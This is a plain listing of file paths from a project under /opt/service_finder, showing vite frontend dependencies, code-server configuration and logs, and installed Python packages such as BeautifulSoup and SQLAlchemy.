+/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/optimizer.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/moduleRunnerTransport.d.ts +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/logger.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/server.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/preview.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/build2.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/build.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/config.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/chunk.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/lib.js +/opt/service_finder/frontend/node_modules/vite/dist/node/chunks/dist.js +/opt/service_finder/frontend/node_modules/vite/dist/node/module-runner.js +/opt/service_finder/frontend/node_modules/vite/dist/node/cli.js +/opt/service_finder/frontend/node_modules/vite/dist/client +/opt/service_finder/frontend/node_modules/vite/dist/client/env.mjs +/opt/service_finder/frontend/node_modules/vite/dist/client/client.mjs +/opt/service_finder/frontend/node_modules/vite/bin +/opt/service_finder/frontend/node_modules/vite/bin/vite.js +/opt/service_finder/frontend/node_modules/vite/bin/openChrome.js +/opt/service_finder/frontend/node_modules/vite/LICENSE.md +/opt/service_finder/frontend/node_modules/vite/README.md +/opt/service_finder/frontend/node_modules/vite/misc +/opt/service_finder/frontend/node_modules/vite/misc/true.js +/opt/service_finder/frontend/node_modules/vite/misc/false.js +/opt/service_finder/frontend/node_modules/ast-walker-scope +/opt/service_finder/frontend/node_modules/ast-walker-scope/package.json +/opt/service_finder/frontend/node_modules/ast-walker-scope/dist +/opt/service_finder/frontend/node_modules/ast-walker-scope/dist/index.d.ts +/opt/service_finder/frontend/node_modules/ast-walker-scope/dist/index.js +/opt/service_finder/frontend/node_modules/ast-walker-scope/LICENSE +/opt/service_finder/frontend/node_modules/ast-walker-scope/README.md +/opt/service_finder/frontend/README.md +/opt/service_finder/frontend/Dockerfile +/opt/service_finder/frontend/.vscode +/opt/service_finder/frontend/.vscode/extensions.json +/opt/service_finder/_Horgony_megjegyzések.txt +/opt/service_finder/deploy_v16.sh +/opt/service_finder/code-server-config +/opt/service_finder/code-server-config/.local +/opt/service_finder/code-server-config/.local/share +/opt/service_finder/code-server-config/.local/share/nano +/opt/service_finder/code-server-config/.local/share/code-server +/opt/service_finder/code-server-config/.local/share/code-server/coder-logs +/opt/service_finder/code-server-config/.local/share/code-server/coder-logs/code-server-stdout.log +/opt/service_finder/code-server-config/.local/share/code-server/coder-logs/code-server-stderr.log +/opt/service_finder/code-server-config/.local/share/code-server/heartbeat +/opt/service_finder/code-server-config/.local/lib +/opt/service_finder/code-server-config/.local/lib/python3.12 +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/REQUESTED +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/AUTHORS +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses/LICENSE +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/core.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/package_data.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/codec.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/idnadata.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/compat.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/intranges.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/idna/uts46data.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4 +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/css.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/_deprecation.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/_typing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/formatter.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/dammit.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/builder +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/builder/_lxml.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/builder/_html5lib.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/builder/_htmlparser.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/builder/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/diagnose.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/exceptions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/filter.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/element.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/bs4/_warnings.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/WHEEL +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/top_level.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/licenses +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/licenses/LICENSE.PSF +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/licenses/LICENSE +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/INSTALLER +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/METADATA +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/RECORD +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/certifi +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/certifi/cacert.pem +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/certifi/core.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/certifi/__main__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/certifi/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/certifi/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/connectors +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/connectors/aioodbc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/connectors/pyodbc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/connectors/asyncio.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/connectors/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/events.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/immutabledict.pyx +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/resultproxy.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/collections.pyx +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/util.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/processors.pyx +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/immutabledict.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/util.pyx +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/collections.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/resultproxy.pyx +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/immutabledict.pxd +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension/processors.cpython-312-x86_64-linux-gnu.so +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/future +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/future/engine.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/future/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/py.typed +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/relationships.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/loading.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/context.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/path_registry.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/sync.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/properties.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/mapped_collection.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/writeonly.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/identity.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/state.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/events.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/decl_base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/dependency.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/unitofwork.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/_typing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/session.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/evaluator.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/mapper.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/scoping.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/state_changes.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/_orm_constructors.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/collections.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/strategy_options.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/persistence.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/dynamic.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/attributes.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/exc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/interfaces.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/decl_api.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/bulk_persistence.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/query.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/descriptor_props.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/instrumentation.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/clsregistry.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/orm/strategies.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event/registry.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event/attr.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event/api.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/event/legacy.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/profiling.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/entities.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/plugin +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/plugin/plugin_base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/plugin/bootstrap.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/plugin/pytestplugin.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/plugin/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/assertions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/config.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/exclusions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/fixtures +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/fixtures/mypy.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/fixtures/sql.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/fixtures/orm.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/fixtures/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/fixtures/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/requirements.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/asyncio.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/pickleable.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/schema.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/provision.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/assertsql.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_rowcount.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_sequence.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_unicode_ddl.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_insert.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_reflection.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_results.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_ddl.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_update_delete.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_cte.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_select.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_deprecations.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/suite/test_dialect.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/engines.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/testing/warnings.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/inspection.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/log.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/aioodbc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/pyodbc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/pymssql.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/information_schema.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/json.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mssql/provision.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/ranges.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/pg_catalog.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/_psycopg_common.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/named_types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/array.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/ext.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/psycopg.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/psycopg2.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/psycopg2cffi.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/asyncpg.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/operators.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/json.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/provision.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/pg8000.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/hstore.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/postgresql/dml.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/_typing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/pysqlite.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/aiosqlite.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/pysqlcipher.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/json.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/provision.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/sqlite/dml.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/enumerated.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/pyodbc.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/aiomysql.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/reserved_words.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/mariadb.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/mysqldb.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/asyncmy.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/mysqlconnector.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/pymysql.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/expression.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/cymysql.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/json.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/provision.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/mariadbconnector.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/reflection.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/mysql/dml.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/cx_oracle.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/vector.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/dictionary.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/provision.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/oracle/oracledb.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/dialects/type_migration_guidelines.txt +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/traversals.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/_elements_constructors.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/coercions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/events.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/functions.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/_selectable_constructors.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/_py_util.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/compiler.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/roles.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/sqltypes.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/_typing.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/visitors.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/crud.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/_dml_constructors.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/ddl.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/base.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/elements.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/_orm_types.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/operators.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/expression.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/selectable.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/schema.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/annotation.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/naming.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/__init__.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/type_api.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/default_comparator.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/cache_key.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/lambdas.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/sql/dml.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/pool +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/pool/impl.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/pool/events.py +/opt/service_finder/code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/pool/base.py 